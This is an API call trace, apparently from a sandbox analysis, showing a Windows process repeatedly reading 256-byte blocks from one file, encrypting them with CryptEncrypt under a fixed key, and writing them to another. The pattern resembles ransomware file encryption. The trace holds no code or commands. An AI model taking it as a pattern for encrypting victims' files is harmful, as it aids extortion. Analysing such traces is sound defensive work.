WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.517] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.517] GetLastError () returned 0x0 [0204.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.517] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.517] GetLastError () returned 0x0 [0204.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.518] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.518] GetLastError () returned 0x0 [0204.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.518] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.518] GetLastError () returned 0x0 [0204.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.518] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.518] GetLastError () returned 0x0 [0204.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.518] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.518] GetLastError () returned 0x0 [0204.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.518] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.518] GetLastError () returned 0x0 [0204.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.519] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.519] GetLastError () returned 0x0 [0204.519] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.519] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.519] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.519] GetLastError () returned 0x0 [0204.519] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.519] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.519] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.519] GetLastError () returned 0x0 [0204.519] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.519] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.519] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.519] GetLastError () returned 0x0 [0204.519] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.519] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.519] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.519] GetLastError () returned 0x0 [0204.519] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.519] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.519] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.519] GetLastError () returned 0x0 [0204.519] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.519] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.520] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.520] GetLastError () returned 0x0 [0204.520] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.520] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.520] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.520] GetLastError () returned 0x0 [0204.520] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.520] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.520] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.520] GetLastError () returned 0x0 [0204.520] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.520] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.520] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.520] GetLastError () returned 0x0 [0204.520] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.520] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.520] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.520] GetLastError () returned 0x0 [0204.520] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.520] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.520] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.520] GetLastError () returned 0x0 [0204.520] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.520] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.521] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.521] GetLastError () returned 0x0 [0204.521] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.521] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.521] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.521] GetLastError () returned 0x0 [0204.521] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.521] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.521] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.521] GetLastError () returned 0x0 [0204.521] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.521] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.521] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.521] GetLastError () returned 0x0 [0204.521] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.521] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.521] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.521] GetLastError () returned 0x0 [0204.521] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.521] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.521] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.521] GetLastError () returned 0x0 [0204.521] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.521] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.522] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.522] GetLastError () returned 0x0 [0204.522] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.522] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.522] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.522] GetLastError () returned 0x0 [0204.522] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.522] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.522] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.522] GetLastError () returned 0x0 [0204.522] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.522] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.522] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.522] GetLastError () returned 0x0 [0204.522] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.522] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.522] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.522] GetLastError () returned 0x0 [0204.522] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.522] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.522] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.523] GetLastError () returned 0x0 [0204.523] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.523] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.523] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.523] GetLastError () returned 0x0 [0204.523] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 